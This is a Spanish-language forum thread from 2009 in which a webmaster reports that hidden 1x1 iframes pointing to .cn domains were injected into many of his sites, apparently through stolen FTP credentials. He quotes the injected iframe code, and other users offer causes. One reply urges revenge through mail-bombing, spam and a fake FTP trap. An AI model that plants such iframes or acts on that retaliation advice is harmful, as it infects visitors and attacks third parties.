Foros del Web » Creando para Internet » Diseño web »

Hackeo en sitios web.

Estas en el tema de Hackeo en sitios web. en el foro de Diseño web en Foros del Web. Hola, escribo ya que estoy desesperado. En más de 15 sitios se me ha colocado un iframe, y el mismo apunta a diferentes web con ...
  #1 (permalink)  
Antiguo 20/04/2009, 10:50
 
Fecha de Ingreso: enero-2009
Mensajes: 6
Antigüedad: 8 años, 10 meses
Puntos: 0
Hackeo en sitios web.

Hola, escribo ya que estoy desesperado. En más de 15 sitios se me ha colocado un iframe, y el mismo apunta a diferentes web con dominio.cn
Ha modificado todo archivo que contenga en su nombre "index" o "home"
en todo el sitio,y por mas que reemplace el archivo, vuelve a aparecer.
Las paginas afectadas en un comienzo ejecutaban un troyano q el antivirus bloqueaba, y ahora no es posible verlas.
Lo que es mas raro aun es que algunos de estos sitios estan en servidores diferentes, por lo que de alguna manera obtienen los datos de FTP.

A continuación les adjunto el codigo de los iframes que se colocan:

<iframe src="direccion.cn" width=1 height=1 style="visibility: hidden"></iframe>


Si ha alguien le ha sucedido, o puede ayudarme, estaria agradecido.
  #2 (permalink)  
Antiguo 20/04/2009, 12:53
Avatar de pitufoweb  
Fecha de Ingreso: enero-2008
Ubicación: Un Mundo Raro
Mensajes: 1.148
Antigüedad: 9 años, 10 meses
Puntos: 181
Respuesta: Hackeo en sitios web.

Usas algún script en la pagina (foro, cms, galeria,etc..)?




Bye
__________________
------------- " La felicidad no llega de afuera, nace desde dentro. " -------------
  #3 (permalink)  
Antiguo 21/04/2009, 14:03
 
Fecha de Ingreso: enero-2009
Mensajes: 6
Antigüedad: 8 años, 10 meses
Puntos: 0
Respuesta: Hackeo en sitios web.

Cita:
Iniciado por pitufoweb Ver Mensaje
Usas algún script en la pagina (foro, cms, galeria,etc..)?




Bye

Hola. En uno de los sitios tenia wordpress y joomla (Lei en varios foros que este tipo de aplicaciones presentan vulnerabilidades), pero en el resto de los sitios no tengo nada de ello.
  #4 (permalink)  
Antiguo 21/04/2009, 14:43
 
Fecha de Ingreso: enero-2009
Mensajes: 6
Antigüedad: 8 años, 10 meses
Puntos: 0
Respuesta: Hackeo en sitios web.

Por lo visto, he encontrado casos similares en varios paises.
Estoy casi seguro que lo que el virus hace es meterse en la pc y robar las contraseñas del ftp. He cambiado todas las contraseñas de los sitios y deje sin funcionamiento a los ftps que tengo configurados en un par de equipos.
Voy a comprobar si es ello, en ese caso el problema base estaria en alguno de mis ordenadores, desde donde se mandarian los usuarios y pass.
  #5 (permalink)  
Antiguo 21/04/2009, 14:46
Avatar de kennysamuerto  
Fecha de Ingreso: mayo-2006
Ubicación: /España/Valencia/index.php
Mensajes: 283
Antigüedad: 11 años, 7 meses
Puntos: 8
Respuesta: Hackeo en sitios web.

Cita:
Iniciado por santiago872 Ver Mensaje
Por lo visto, he encontrado casos similares en varios paises.
Estoy casi seguro que lo que el virus hace es meterse en la pc y robar las contraseñas del ftp. He cambiado todas las contraseñas de los sitios y deje sin funcionamiento a los ftps que tengo configurados en un par de equipos.
Voy a comprobar si es ello, en ese caso el problema base estaria en alguno de mis ordenadores, desde donde se mandarian los usuarios y pass.
Como dudo eso que dices.

Me huele mas a una vulnerabilidad de tu servidor, que a un virus.
  #6 (permalink)  
Antiguo 21/04/2009, 14:48
Avatar de jaao_death  
Fecha de Ingreso: abril-2009
Ubicación: Murcia/españa
Mensajes: 229
Antigüedad: 8 años, 7 meses
Puntos: 6
Respuesta: Hackeo en sitios web.

Intenta no borrar el Trojano que te causa problemas para así averiguar a que dirección manda tus datos, luego le puedes hacer un mail-bombing o spam para que tu venganza tome parte, o intenta conseguir datos de ese usuario mandándole una ftp falsa y que le dirija a algún pc tuyo, así guardas los datos y le haces la broma....
  #7 (permalink)  
Antiguo 21/04/2009, 15:23
 
Fecha de Ingreso: enero-2009
Mensajes: 6
Antigüedad: 8 años, 10 meses
Puntos: 0
Respuesta: Hackeo en sitios web.

Cita:
Iniciado por kennysamuerto Ver Mensaje
Como dudo eso que dices.

Me huele mas a una vulnerabilidad de tu servidor, que a un virus.

He descartado eso, ya que tengo un par de sitios en servidores diferentes (dos de ellos en otro pais) y les ha sucedido lo mismo.
Por ahora no ha sucedido nuevamente, en ninguno de los sitios volvio a aparecer el iframe.
Igualmente estoy atento, por si vuelve a suceder.
Por lo que he leido en algunos articulos, el problema estaria en el ordenador.
  #8 (permalink)  
Antiguo 22/04/2009, 01:58
Avatar de zaetoner  
Fecha de Ingreso: noviembre-2007
Ubicación: La ciudad de México
Mensajes: 607
Antigüedad: 10 años
Puntos: 30
Respuesta: Hackeo en sitios web.

me parece que es un script en el .htacces revisalo esta en la raiz de tu web
  #9 (permalink)  
Antiguo 22/04/2009, 08:57
Avatar de CircuitoX  
Fecha de Ingreso: julio-2008
Mensajes: 756
Antigüedad: 9 años, 4 meses
Puntos: 21
Respuesta: Hackeo en sitios web.

Podrías poner las direcciones de las Web. Que supuestamente están sufriendo un hackeo.
__________________
Diseño Robotico en Arequipa / Desarrollo web / Sitios / Paginas / 99 css3
  #10 (permalink)  
Antiguo 22/04/2009, 10:39
 
Fecha de Ingreso: enero-2009
Mensajes: 6
Antigüedad: 8 años, 10 meses
Puntos: 0
Respuesta: Hackeo en sitios web.

Hola a todos, gracias por sus aportes.

Hace ya 2 dias q modifique todas las contraseñas y tengo los ftp sin configurar, por ahora no volvieron a modificar los sitios.

Disculpen que no les pase alguna de las web para ver, igualmente hice backup del servidor de todos los sitios afectados.
  #11 (permalink)  
Antiguo 22/04/2009, 10:48
 
Fecha de Ingreso: abril-2009
Mensajes: 2
Antigüedad: 8 años, 7 meses
Puntos: 0
Respuesta: Hackeo en sitios web.

Pon las webs y así podremos ver todo con detalle.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:29.